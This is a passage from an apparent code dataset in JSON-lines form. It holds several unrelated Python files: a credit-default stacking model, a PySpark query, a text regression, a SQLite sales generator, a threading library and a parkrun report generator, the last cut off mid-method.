eval_metric= 'auc', verbose= 100, early_stopping_rounds= 200)\n \n X_test_predict = application_test[important_columns].fillna(0)\n y_test_predict = clf.predict_proba(X_test_predict, num_iteration=clf.best_iteration_)\n \n submission = pd.DataFrame({'SK_ID_CURR': application_test['SK_ID_CURR'], 'TARGET': y_test_predict[:, 1]})\n submission.to_csv(name, index=False)\n \n\n################################################################\n# try removing random features \n# add new interesting features\n# add stacking\n################################################################\nwith open('whole_df', 'rb') as f:\n whole_df = pickle.load(f)\n\nimportant_columns = list(whole_df.columns)\nimportant_columns.remove('SK_ID_CURR')\nimportant_columns.remove('index')\nimportant_columns.remove('TARGET')\n#important_columns.remove('SK_ID_BUREAU')\n#important_columns.remove('SK_ID_PREV')\n\nmodel= 'model_16'\nversion=0\nestimators=100000\ndesc = \"stacked model trained for all features\"\nalgo = 'LGB XGB RF EXTRATREES'\n\napplication_train = whole_df[whole_df['TARGET'].notnull()]\ny_true = application_train[['SK_ID_CURR', 'TARGET']]\n\napplication_test = whole_df.loc[whole_df['TARGET'].isnull(), important_columns]\n\napplication_train.replace([np.inf, -np.inf], 0, inplace = True)\napplication_test.replace([np.inf, -np.inf], 0, inplace = True)\napplication_test = application_test.fillna(0)\n\nX_train, y_train, X_dev, y_dev = get_train_dev_data(application_train, y_true, important_columns)\n\ntest_skids = whole_df.loc[whole_df['TARGET'].isnull(), 'SK_ID_CURR'].values # keep the test ids: whole_df is deleted just below\ndel application_train, y_true, whole_df\ngc.collect()\n \nNFOLDS = 4\nSEED = 0\nkf = StratifiedKFold(n_splits = NFOLDS, shuffle=True, random_state=SEED)\n\net_params = {\n'n_jobs': 16,\n'n_estimators': 200,\n'max_features': 0.5,\n'max_depth': 12,\n'min_samples_leaf': 2,\n'verbose': 10\n}\n\nrf_params = {\n 'n_jobs': 16,\n 'n_estimators': 200,\n 'max_features': 0.2,\n 'max_depth': 12,\n 'min_samples_leaf': 2,\n 'verbose': 10\n\n}\n\nxgb_params = {\n 'seed': 0,\n 'colsample_bytree': 0.7,\n 'silent': 1,\n 'subsample': 0.7,\n 'learning_rate': 0.075,\n 'objective': 'binary:logistic',\n 'max_depth': 4,\n 'num_parallel_tree': 1,\n 'min_child_weight': 1,\n 'nrounds': 200\n}\n\nlightgbm_params = {\n 'nthread':16,\n 'n_estimators':1200,\n 'learning_rate':0.02,\n 'num_leaves':34,\n 'colsample_bytree':0.9497036,\n 'subsample':0.8715623,\n 'max_depth':8,\n 'reg_alpha':0.041545473,\n 'reg_lambda':0.0735294,\n 'min_split_gain':0.0222415,\n 'min_child_weight':39.3259775,\n 'verbose':100, \n}\n\nxg = XgbWrapper(seed=SEED, params=xgb_params)\net = SklearnWrapper(clf=ExtraTreesClassifier, seed=SEED, params=et_params)\nrf = SklearnWrapper(clf=RandomForestClassifier, seed=SEED, params=rf_params)\nlg = LightGBMWrapper(clf = LGBMClassifier, seed = SEED, params = lightgbm_params)\n\nprint('XG')\nxg_oof_train, xg_oof_dev, xg_oof_test = get_oof(xg, kf, NFOLDS, X_train, y_train, X_dev, y_dev, application_test)\nprint('ET')\net_oof_train, et_oof_dev, et_oof_test = get_oof(et, kf, NFOLDS, X_train, y_train, X_dev, y_dev, application_test)\nprint('RF')\nrf_oof_train, rf_oof_dev, rf_oof_test = get_oof(rf, kf, NFOLDS, X_train, y_train, X_dev, y_dev, application_test)\nprint('LG')\nlg_oof_train, lg_oof_dev, lg_oof_test = get_oof(lg, kf, NFOLDS, X_train, y_train, X_dev, y_dev, application_test)\n\n\nx_train = np.concatenate((xg_oof_train, et_oof_train, rf_oof_train, lg_oof_train), axis=1)\nx_dev = np.concatenate((xg_oof_dev, et_oof_dev, rf_oof_dev, lg_oof_dev), axis=1)\nx_test = np.concatenate((xg_oof_test, et_oof_test, rf_oof_test, lg_oof_test), 
axis=1)\n\nprint(\"{},{}\".format(x_train.shape, x_test.shape))\n\nlogistic_regression = LogisticRegression()\nlogistic_regression.fit(x_train,y_train)\n\n###################################################\n# results on the train set\n###################################################\n \ny_train_predict = logistic_regression.predict(x_train)\ny_train_predict_proba = logistic_regression.predict_proba(x_train)\n\nscores_df = get_scores(y_train, y_train_predict, y_train_predict_proba[:, 1], 'train')\n \n###################################################\n# results on the dev set\n###################################################\n\ny_dev_predict = logistic_regression.predict(x_dev)\ny_dev_predict_proba = logistic_regression.predict_proba(x_dev)\n\n# get dev scores\nscores_df = scores_df.append(get_scores(y_dev, y_dev_predict, y_dev_predict_proba[:, 1], 'test'))\n\n\nwith open('all_reasults.csv', 'a') as f:\n spamwriter = csv.writer(f)\n spamwriter.writerow([model,\n version,\n desc,\n algo,\n algo+\"(n_estimators=\"+str(estimators)+\" random_state=0)\",\n str(round(scores_df['test_roc_auc'], 4)),str(round(scores_df['test_accuracy'], 4)),\n str(round(scores_df['test_recall'], 4)),str(round(scores_df['test_fpr'], 4)),\n str(round(scores_df['test_precision'], 4)),str(round(scores_df['test_f1'], 4)),\n \"NA\",\"NA\",\"dev set\",\n str(round(scores_df['train_roc_auc'], 4)),str(round(scores_df['train_accuracy'], 4)),\n str(round(scores_df['train_recall'], 4)),str(round(scores_df['train_fpr'], 4)),\n str(round(scores_df['train_precision'], 4)),str(round(scores_df['train_f1'], 4))])\n\napplication_test['TARGET'] = logistic_regression.predict_proba(x_test)[:,1] \napplication_test['SK_ID_CURR'] = whole_df.loc[whole_df['TARGET'].isnull(), 'SK_ID_CURR']\n\napplication_test[['SK_ID_CURR', 'TARGET']].to_csv('submission_22.csv', index=False, float_format='%.8f')\n\n","sub_path":"home_credit_default_risk/models/model_16_stacked.py","file_name":"model_16_stacked.py","file_ext":"py","file_size_in_byte":47280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"317029408","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 17 12:28:00 2021\n\n@author: patilnarayan\n\"\"\"\n\n# importing necessary libraries\nfrom pyspark import SparkContext\nfrom pyspark.sql import SQLContext\n\nsc = SparkContext('local','example') # if using locally\nsqlContext = SQLContext(sc)\n\n# fetching tables from hive tables\ndf=sqlContext.sql(\"select * from hospital.patients\")\n\n# visualization Data\ndf.show()\n\n#customers as per Country \n# India patients extracting\n# change in 'IND' if you want any other country data\ndf.where(df.Country=='IND').show()\n \n","sub_path":"TestDrivenDevelopment.py","file_name":"TestDrivenDevelopment.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"284938977","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 7 11:55:26 2019\n\n@author: wenyi\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\nimport re, string\n\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import wordnet\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize \n\nnltk.download('punkt')\nnltk.download('stopwords')\nnltk.download('wordnet')\nnltk.download('averaged_perceptron_tagger')\n\nfrom sklearn import preprocessing\nfrom sklearn.cross_decomposition import 
PLSRegression\nfrom sklearn import linear_model\n\n\n# helper function for lemmatization\ndef get_wordnet_pos(word):\n tag = nltk.pos_tag([word])[0][1][0].upper()\n tag_dict = {\"J\": wordnet.ADJ,\n \"N\": wordnet.NOUN,\n \"V\": wordnet.VERB,\n \"R\": wordnet.ADV}\n return tag_dict.get(tag, wordnet.NOUN)\n\n\ndef pre_process_data(data):\n stop_words = set(stopwords.words('english'))\n lemmatizer = WordNetLemmatizer()\n\n new_data = []\n for i in range(len(data)):\n review = data[i]\n # convert to lowercase\n review = review.lower()\n\n # add whiltespace after punctuation\n review = re.sub( r'([a-zA-Z])([,.!])', r'\\1\\2 ', review)\n\n # remove punctuation\n review = review.translate(string.maketrans(\"\",\"\"), string.punctuation)\n\n filtered_review = \"\" \n for w in word_tokenize(review):\n# print(w)\n# print(get_wordnet_pos(w))\n if get_wordnet_pos(w) == \"v\":\n# print(\"discard verb\")\n continue\n\n # Lemmatize with POS Tag\n try:\n w = lemmatizer.lemmatize(w, get_wordnet_pos(w))\n except:\n # fiancé, café, crêpe, puréed\n # w = unidecode.unidecode(unicode(w, \"utf-8\"))\n continue\n \n # remove stop word\n if w not in stop_words:\n filtered_review =filtered_review + w + \" \"\n\n review = filtered_review\n new_data.append(review) \n\n return np.array(new_data)\n\n\n# \"train\" \"test\"\ndef load_description_data(data, size):\n \"\"\" \n load description data\n -----------\n \n Parameters\n -----------\n data: \"train\" / \"test\"\n size: int\n \n \n Return\n -----------\n 5-sentences data after removing stop words and lemmatizing \n \"\"\"\n \n path = \"./data/descriptions_\" + data + \"/\"\n temp = []\n \n for i in range(size):\n file_name = str(i) + '.txt'\n file_path = path + file_name\n des = \"\"\n with open(file_path) as f:\n for line in f.readlines():\n des = des + (line.strip('\\n')) + ' '\n temp.append(des)\n \n result = np.array(pre_process_data(temp))\n savepath = data + \"_des.csv\"\n np.savetxt(savepath, result, fmt='%s')\n return result\n\n\ndef build_description_feature(data):\n \"\"\" \n build feature vectors\n -----------\n \n Parameters\n -----------\n data: \"train\" / \"test\" \n \n Return\n -----------\n normalized feature vectors \n \"\"\"\n \n temp_dict = {}\n temp_dict[\"train\"] = training_data\n temp_dict[\"test\"] = testing_data\n \n temp = []\n for i in range(len(temp_dict[data])):\n # initialize a vector of size (1*6719) \n review_vector = np.zeros(len(word_dict))\n review = temp_dict[data][i]\n \n for w in word_tokenize(review):\n if w in word_dict:\n index = word_dict.keys().index(w)\n review_vector[index] += 1 \n \n temp.append(review_vector)\n \n temp = np.array(temp)\n temp = preprocessing.normalize(temp, norm='l2') \n return temp\n\n\n##########################################################\n# Descrptions features (data)\n##########################################################\n\n# training_data = load_description_data(\"train\", 10000)\n# testing_data = load_description_data(\"test\", 2000)\n\ntraining_data_df = pd.read_csv('./train_des.csv', header=None)\ntesting_data_df = pd.read_csv('./test_des.csv', header=None)\n\ntraining_data = []\ntesting_data = []\n\nfor row in training_data_df.iterrows():\n training_data.append(\" \".join(row[1]))\nfor row in testing_data_df.iterrows():\n testing_data.append(\" \".join(row[1]))\n\ntraining_data = np.array(training_data)\ntesting_data = np.array(testing_data)\n\nprint(training_data.shape)\nprint(testing_data.shape)\nprint(\"****** Done loading training/testing description data ******\")\n\n\n\n# Bag 
of Words Model \nword_dict = {}\n\n# iterate thru all reviews in the training set\nfor i in range(len(training_data)):\n review = training_data[i]\n \n for w in word_tokenize(review):\n if w not in word_dict:\n word_dict[w] = 0\n\nprint(len(word_dict)) #7321\n#print(word_dict)\nprint(\"****** Done building word dictionary ******\")\n\n\n# iterate all reviews in both sets to create review feature vectors\ntraining_vectors = build_description_feature(\"train\")\ntesting_vectors = build_description_feature(\"test\")\n\nprint(training_vectors.shape) #10000*7321\nprint(training_vectors)\n\nprint(testing_vectors.shape) # 2000*7321\n#print(testing_vectors)\nprint(\"****** Done building bow features normalizations ******\")\n\n\n\n\n\n##########################################################\n# Image features (label)\n##########################################################\n\ntraining_label = pd.read_csv(\n './data/features_train/training-image-feature-2.csv', \n sep=\",\", header=None)\n\nprint(training_label.shape)\n\ntesting_label = pd.read_csv(\n './data/features_test/testing-image-feature-2.csv', \n sep=\",\", header=None)\n\nprint(testing_label.shape)\nprint(\"****** Done loading images features ******\")\n\n\n\n\n\n\n##########################################################\n# Model \n##########################################################\n\nlr = linear_model.LinearRegression()\nlr.fit(training_vectors, training_label)\nlr_pred = lr.predict(testing_vectors)\nprint(lr_pred.shape)\nprint(lr_pred)\nprint(\"\\n**** Done LRegression ****\") \n\nnp.savetxt(\"./output/lr_pred.csv\",lr_pred, delimiter=\",\")\nprint(\"\\n**** Saving output ****\") \n\n","sub_path":"checkpoint/v3-bow-LR.py","file_name":"v3-bow-LR.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"289537199","text":"import sqlite3\r\nimport random\r\nimport datetime\r\nconn=sqlite3.connect('Sales.db')\r\n\r\nk=conn.cursor()\r\n\r\nk.execute('''CREATE TABLE IF NOT EXISTS Sales ( \r\n Id INTEGER PRIMARY KEY,\r\n Country TEXT, \r\n City TEXT, \r\n Shop TEXT, \r\n Date DATETIME, \r\n Money INTEGER\r\n );\r\n ''')\r\n\r\n\r\nCountries = [ 'Russia',\r\n 'German',\r\n 'Ukrain',\r\n 'UK']\r\nCities = {'Russia':\r\n ['Moscow', 'Belgorod', 'St. 
Petersburg', 'Kogalym'],\r\n 'German':\r\n ['Berlin', 'Munich ', 'Frankfurt', 'Dortmund '],\r\n 'Ukrain':\r\n ['Kiev', 'Odessa', 'Minsk', 'Varsaw' ],\r\n 'UK':\r\n ['London', 'Manchester', 'Liverpool', 'Glasgow']}\r\nShops = ['Taobao', 'Amazon','Aliexpress','eBay']\r\n\r\nf = open(\"result.txt\", \"w\",encoding='utf-8')\r\n\r\n\r\nstart_date=datetime.datetime(2014, 1, 1,0,0,0)\r\nend_date = datetime.datetime(2015, 1, 1,0,0,0)\r\n\r\nfor i in range(10000):\r\n cur_country=random.choice(Countries)\r\n cur_city=random.choice(Cities[cur_country])\r\n cur_shop=random.choice(Shops)\r\n cur_date=start_date+(end_date-start_date)*random.random()\r\n cur_int=random.randint(10000,1000000)\r\n k.execute( '''INSERT INTO Sales(\r\n Country , \r\n City , \r\n Shop , \r\n Date , \r\n Money ) VALUES ( ?, ?, ?, ?, ?)''',\r\n (\r\n \r\n cur_country,\r\n cur_city,\r\n cur_shop,\r\n cur_date,\r\n cur_int\r\n ) \r\n )\r\n if(i<100):\r\n f.writelines(str(i)+\"\\t\")\r\n f.writelines(cur_country+\"\\t\")\r\n f.writelines(cur_city+\"\\t\")\r\n f.writelines(cur_shop+\"\\t\")\r\n f.writelines(str(cur_date)+\"\\t\")\r\n f.writelines(str(cur_int)+\"\\t\\n\")\r\n\r\n\r\n\r\nf.writelines('Задание 1\\n')\r\nquery = 'SELECT COUNT(*) FROM Sales'\r\nk.execute(query)\r\nf.writelines([query,\"\\nКоличество записей:\" + str(k.fetchall()[0][0])+\"\\n\"])\r\n\r\n\r\nf.writelines('Задание 2\\n')\r\n\r\nquery = 'Select Country, count(Shop) from Sales group by Country'\r\nf.writelines([query,\"\\nКоличество магазинов в стране:\\n\"])\r\nres=k.execute(query).fetchall()\r\nfor i in res:\r\n f.writelines(str(j)+'\\t' for j in i)\r\n f.write('\\n')\r\n\r\n\r\n\r\n\r\nf.writelines('Задание 3\\n')\r\nquery = 'SELECT Shop, SUM(Money) FROM Sales GROUP BY Shop'\r\nf.writelines([query,\"\\nСумма продаж по магазинам:\\n\"])\r\nk.execute(query)\r\nres=k.fetchall()\r\nfor i in res:\r\n f.writelines(str(j)+'\\t' for j in i)\r\n f.write('\\n')\r\n \r\n\r\n\r\nf.writelines('Задание 4\\n')\r\nquery='''SELECT Shop, SUM(Money) FROM Sales WHERE (Country = ? 
AND \r\nDate BETWEEN \"2014-06-01\" AND \"2014-09-01\") GROUP BY Shop'''\r\ncur_country = input(\"\\nВведите страну: \")\r\nf.writelines([query,\"\\nВ стране \"+cur_country+\" выручка за лето составила\\n\"])\r\n\r\nres=k.execute(query, (cur_country, )).fetchall()\r\nfor i in res:\r\n f.writelines(str(j)+'\\t' for j in i)\r\n f.write('\\n')\r\n\r\nf.close()\r\nconn.commit()\r\nconn.close()","sub_path":"Lab2/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"6739228","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# multitasking: Non-blocking Python methods using decorators\n# https://github.com/ranaroussi/multitasking\n#\n# Copyright 2016 Ran Aroussi\n#\n# Licensed under the GNU Lesser General Public License, v3.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.gnu.org/licenses/lgpl-3.0.en.html\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n__version__ = \"0.0.4a\"\n\nfrom sys import exit as sysexit\nfrom os import _exit as osexit\n\nfrom threading import Thread, Semaphore\nfrom multiprocessing import Process, cpu_count\n\n__CPU_CORES__ = cpu_count()\n\n# processing\n__ENGINE__ = \"thread\"\n__MAX_THREADS__ = cpu_count()\n__KILL_RECEIVED__ = False\n__TASKS__ = []\n__POOLS__ = {}\n__POOL_NAME__ = \"Main\"\n\n\ndef set_max_threads(threads=None):\n global __MAX_THREADS__\n if threads is not None:\n __MAX_THREADS__ = threads\n else:\n __MAX_THREADS__ = cpu_count()\n\n\ndef set_engine(kind=\"\"):\n global __ENGINE__\n if \"process\" in kind.lower():\n __ENGINE__ = \"process\"\n else:\n __ENGINE__ = \"thread\"\n\ndef getPool(name=None):\n if name is None:\n name = __POOL_NAME__\n\n return {\n \"engine\": \"thread\" if __POOLS__[__POOL_NAME__][\"engine\"] == Thread else \"process\",\n \"name\": name,\n \"threads\": __POOLS__[__POOL_NAME__][\"threads\"]\n }\n\ndef createPool(name=\"main\", threads=None, engine=None):\n global __MAX_THREADS__, __ENGINE__, __POOLS__, __POOL_NAME__\n\n __POOL_NAME__ = name\n\n try: threads = int(threads)\n except: threads = __MAX_THREADS__\n if threads < 2: threads = 0\n\n\n engine = engine if engine is not None else \"thread\"\n\n __MAX_THREADS__ = threads\n __ENGINE__ = engine\n\n __POOLS__[__POOL_NAME__] = {\n \"pool\": Semaphore(threads) if threads > 0 else None,\n \"engine\": Process if \"process\" in engine.lower() else Thread,\n \"name\": name,\n \"threads\": threads\n }\n\ndef task(callee):\n global __KILL_RECEIVED__, __TASKS__, __POOLS__, __POOL_NAME__\n\n # create default pool if nont exists\n if not __POOLS__:\n createPool()\n\n def _run_via_pool(*args, **kwargs):\n with __POOLS__[__POOL_NAME__]['pool']:\n return callee(*args, **kwargs)\n\n def async_method(*args, **kwargs):\n # no threads\n if __POOLS__[__POOL_NAME__]['threads'] == 0:\n return callee(*args, **kwargs)\n\n # has threads\n if not __KILL_RECEIVED__:\n task = __POOLS__[__POOL_NAME__]['engine'](\n target=_run_via_pool, args=args, kwargs=kwargs, daemon=False)\n __TASKS__.append(task)\n task.start()\n return task\n\n return async_method\n\ndef wait_for_tasks():\n global __KILL_RECEIVED__, 
__TASKS__, __POOLS__, __POOL_NAME__\n __KILL_RECEIVED__ = True\n\n if __POOLS__[__POOL_NAME__]['threads'] == 0:\n return True\n\n try:\n running = len([t.join(1) for t in __TASKS__ if t is not None and t.isAlive()])\n while running > 0:\n running = len([t.join(1) for t in __TASKS__ if t is not None and t.isAlive()])\n except:\n pass\n return True\n\ndef killall(cls):\n global __KILL_RECEIVED__\n __KILL_RECEIVED__ = True\n try:\n sysexit(0)\n except SystemExit:\n osexit(0)\n","sub_path":"mDataAn_venv/Lib/site-packages/multitasking/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"556781787","text":"from bs4 import BeautifulSoup\nfrom re import compile\nfrom itertools import zip_longest\nfrom jinja2 import Environment, FileSystemLoader\n\n\nclass RunReportUtils:\n\n @staticmethod\n def get_sections(seq, num):\n out = []\n last = 0.0\n\n while last < len(seq):\n out.append(seq[int(last):int(last + num)])\n last += num\n\n return out\n\n @staticmethod\n def chunks(seq, chunk_size):\n \"\"\"Yield successive chunkSize-sized chunks from list.\"\"\"\n for i in range(0, len(seq), chunk_size):\n yield seq[i:i + chunk_size]\n\n @staticmethod\n def reverse_find(haystack, needle, n):\n pos = len(haystack)\n for i in range(0, n):\n pos = haystack.rfind(needle, 0, pos)\n return pos\n\n\nclass RunReport(object):\n parkrun_name = ''\n parkrun_event_number = ''\n options = {\n 'template_name': 'base',\n 'runner_limit': 7,\n 'volunteer_limit': 2,\n 'pb_limit': 2,\n 'number_event_urls': 8\n }\n\n template_loader = False\n template_env = False\n \n results_system_text = ''\n current_event_volunteers = []\n current_event_runners = {}\n\n event_result_count = []\n runners = {}\n volunteers = {}\n photos = []\n toc = []\n\n content_text = {}\n \n VOLUNTEER_START_TEXT = 'We are very grateful to the volunteers who made this event happen:'\n PB_TEXT = 'New PB!'\n RESULT_SYSTEM_START_TEXT = 'This week'\n\n def __init__(self, name, event_number):\n self.parkrun_name = name\n self.parkrun_event_number = event_number\n\n self.template_loader = FileSystemLoader(searchpath=\"templates/\")\n self.template_env = Environment(loader=self.template_loader)\n self.template_env.trim_blocks = True\n self.template_env.lstrip_blocks = True\n \n # make sure these are reset each time you call the init\n self.runners = {}\n self.volunteers = {}\n\n def set_results_system(self, text):\n text = text.strip()\n if text == '':\n return\n if len(text) > 3000:\n print(\"Result System Text is limited to 3000 characters\\nAre you sure you copied from the results system?\")\n return\n self.results_system_text = text\n\n def reset_event_result(self):\n self.current_event_volunteers = []\n self.current_event_runners = {}\n self.runners = {}\n self.volunteers = {}\n\n def parse_event_result(self, is_current=False, text=''):\n text = text.strip()\n if text == '':\n return\n if len(text) > 500000:\n print(\"Event Text is limited to 500,000 characters\")\n return\n if is_current:\n self.set_current_event(text)\n self.parse_runners(text)\n self.parse_volunteers(text)\n\n def parse_optional_text(self, text_type, text):\n text = text.strip()\n if text == '':\n return\n if len(text) > 3000:\n print(\"Optional Text is limited to 3000 characters\")\n return\n self.content_text[text_type] = text.format(self.parkrun_name)\n\n def set_current_event(self, text):\n text = text.strip()\n if text == '':\n return\n # set 
currentEventRunners and currentEventVolunteers \n self.set_current_event_runners(text)\n self.set_current_event_volunteers(text)\n \n def parse_current_event(self, text, parse_type):\n soup = BeautifulSoup(text, 'html.parser')\n rows = []\n if parse_type == 'runners':\n # get every row from the result table\n rows = soup.find(id=\"results\").find(\"tbody\").find_all(\"tr\")\n elif parse_type == 'volunteers':\n #
\n # We are very grateful to the volunteers who made this event happen:\n #
\n start = soup.p.find(text=compile(self.VOLUNTEER_START_TEXT))\n pos = start.find(':')\n sub = start[pos+1:]\n rows = sub.split(', ') \n return rows \n \n def set_current_event_runners(self, text):\n self.current_event_runners = {}\n rows = self.parse_current_event(text, 'runners')\n for row in rows:\n details = self.get_runner_details(row.find_all(\"td\"))\n if details:\n self.current_event_runners[details['id']] = {\n \"name\": details['name'],\n \"time\": details['time'],\n \"age_group\": details['age_group']\n }\n \n def set_current_event_volunteers(self, text):\n self.current_event_volunteers = []\n names = self.parse_current_event(text, 'volunteers')\n for n in names:\n self.current_event_volunteers.append(n)\n \n def get_runner_details(self, cells):\n # \n # 2\n #
Firstname LASTNAME\n # 18:14\n # SM30-34\n # 71.12 %\n # M\n # 2\n # \n # New PB!\n # 2\n # \n # \n cell = cells[1]\n name = cell.get_text() \n if name != 'Unknown':\n href = cell.a[\"href\"]\n # format of href=\"athletehistory?athleteNumber=208507\"\n pos = href.find('=')\n athlete_id = href[pos+1:]\n \n time = cells[2].get_text()\n age_group = cells[3].get_text()\n position = cells[0].get_text()\n pb = 0\n if cells[8].get_text() == self.PB_TEXT:\n pb = 1\n\n return {\n \"id\": athlete_id,\n \"name\": name,\n \"time\": time,\n \"pb\": pb,\n \"age_group\": age_group,\n \"position\": position\n }\n else:\n return False \n \n def parse_runners(self, text):\n text = text.strip()\n if text == '':\n return\t\n rows = self.parse_current_event(text, 'runners')\n event_count = 0\n for row in rows:\n cells = row.find_all(\"td\")\n details = self.get_runner_details(cells)\n if details:\n event_count = event_count + 1\n pb_count = 0\n if details['id'] in self.runners:\n count = self.runners[details['id']]['count'] + 1\n if details['pb'] == 1:\n pb_count = self.runners[details['id']]['pb_count'] + 1\n else:\n pb_count = self.runners[details['id']]['pb_count']\n else:\n count = 1\n if details['pb'] == 1:\n pb_count = 1\n\n self.runners[details['id']] = {\"name\": details['name'], \"pb_count\": pb_count, \"count\": count}\n self.event_result_count.append(event_count)\n # display number of runners as you parse each event result\n # this is to indicate to the user that something is happening\n # and as a visual guide that they can see the the totals, and double check data if duplicate numbers\n # i.e. they didn't accidentally copy and paste from the same event twice\n print('Event with '+str(event_count)+' known runners added')\n \n def parse_volunteers(self, text):\n text = text.strip()\n if text == '':\n return\n\n names = self.parse_current_event(text, 'volunteers')\n for n in names:\n if n in self.volunteers:\n count = self.volunteers[n] + 1\n else:\n count = 1\n self.volunteers[n] = count\n\n def reset_photos(self):\n self.photos = []\n \n def add_photo(self, size, photo_type, title='', text=''):\n text = text.strip()\n if text == '':\n return\n if len(text) > 300:\n print(\"Photo Text is limited to 300 characters\")\n return\n start_pos = text.find('[img]') + len('[img]')\n end_pos = text.find('.jpg') + len('.jpg')\n flickr_link = text[start_pos:end_pos]\n \n self.photos.append({'link': flickr_link, 'size': size, 'type': photo_type, 'title': title})\n \n def get_photo_links(self, photo_type):\n photos = []\n # width of 620 works best of the parkrun wordpress page\n picture_width = 620\n for p in self.photos:\n if p['type'] == photo_type:\n dims = p['size']\n curr_width = int(dims[0])\n curr_height = int(dims[1])\n # resize to a standard width of picture_width if picture is landscape\n if curr_width >= curr_height:\n dims[0] = picture_width\n dims[1] = (picture_width * curr_height) // curr_width\n # resize to a width that allows 2 pictures on a line if picture are portrait\n elif curr_height > curr_width:\n # get two pictures on one row\n dims[0] = picture_width // 2 - 5\n dims[1] = ((picture_width / 2 - 5) * curr_height) // curr_width\n photos.append({\n 'link': p['link'],\n 'alt': p['type'],\n 'width': dims[0],\n 'height': dims[1],\n 'title': p['title']\n })\n return photos\n \n def get_aesthetic_times(self):\n times_list = []\n\n for key, data in self.current_event_runners.items():\n time = data['time']\n # end in :00 or start = end like 21:21\n if time[-2:] == '00' or time[-2:] == time[0:2]:\n 
times_list.append(str(time) + ' - ' + data['name'])\n # e.g. 22:33 \n elif time[0] == time[1] and time[3] == time[4]:\n times_list.append(str(time) + ' - ' + data['name'])\n # e.g. 21:12 \n elif time[0] == time[4] and time[1] == time[2]:\n times_list.append(str(time) + ' - ' + data['name'])\n\n return times_list\n\n def calc_age_groups(self):\n runners = self.current_event_runners\n age_group = {}\n # results are sorted by position number, so first found for each age group is the fastest\n for l, v in runners.items():\n age = v['age_group']\n age_number = age[2:]\n details = {'name': v['name'], 'time': v['time']}\n if age[0:2] == 'SM' or age[0:2] == 'VM':\n if age_number not in age_group:\n age_group[age_number] = {'man': details, 'woman': {'name': '', 'time': ''}}\n elif age_group[age_number]['man']['name'] == '':\n age_group[age_number]['man'] = details\n elif age[0:2] == 'SW' or age[0:2] == 'VW':\n if age_number not in age_group:\n age_group[age_number] = {'man': {'name': '', 'time': ''}, 'woman': details}\n elif age_group[age_number]['woman']['name'] == '':\n age_group[age_number]['woman'] = details\n sorted_age = sorted(age_group.items(), key=lambda x: x[0])\n return sorted_age\n \n def get_age_group_finisher_summary(self):\n headers = [\n {'width': 20, 'text': 'Age Group', 'colspan': 1},\n {'width': 40, 'text': 'Men', 'colspan': 2},\n {'width': 40, 'text': 'Women', 'colspan': 2}\n ]\n summary_data = self.calc_age_groups()\n data = []\n for l, v in summary_data:\n data.append([l, v['man']['name'], v['man']['time'], v['woman']['name'], v['woman']['time']])\n\n return {'headers': headers, 'data': data}\n \n def get_regular_summary(self, runner_limit, volunteer_limit):\n events = len(self.event_result_count)\n headers = [\n {'width': 50, 'colspan': 1, 'type': 'Runners', 'limit': runner_limit, 'events': events},\n {'width': 50, 'colspan': 1, 'type': 'Volunteers', 'limit': volunteer_limit, 'events': events}\n ]\n # get the sorted name column for all runners with count above runner_limit\n regular_runners = [v['name'] for k, v in self.runners.items() if v['count'] >= runner_limit]\n runners_names = sorted(regular_runners)\n\n # get the sorted name column for all volunteers with count above volunteer_limit\n regular_volunteer = [k for k, v in self.volunteers.items() if v >= volunteer_limit]\n volunteer_names = sorted(regular_volunteer)\n # display as two columns, one for runners, one for volunteers, and they will probably be different lengths\n # so need to transpose the data\n combined = [runners_names, volunteer_names]\n data = list(zip_longest(*combined, fillvalue=''))\n\n return {'headers': headers, 'data': data}\n\n def get_pb_summary(self, pb_limit=2, data_columns=2):\n events = len(self.event_result_count)\n headers = [{'width': 100, 'colspan': data_columns, 'type': 'PBs', 'limit': pb_limit, 'events': events}]\n # get the sorted name column for all runners with pb_count above pb_limit\n summary_data = sorted([v['name'] for k, v in self.runners.items() if v['pb_count'] >= pb_limit])\n if data_columns == 1:\n data = summary_data\n else:\n # create list of data_columns size lists so the data can be multiple columns\n data = list(RunReportUtils.chunks(summary_data, data_columns))\n\n return {'headers': headers, 'data': data}\n\n\nclass RunReportWeek(RunReport):\n \n parkrun_week = 1\n run_report_html = ''\n sections = []\n \n def __init__(self, name, event_number):\n RunReport.__init__(self, name, event_number) \n \n def print_urls(self, week, number_event_urls):\n links = []\n 
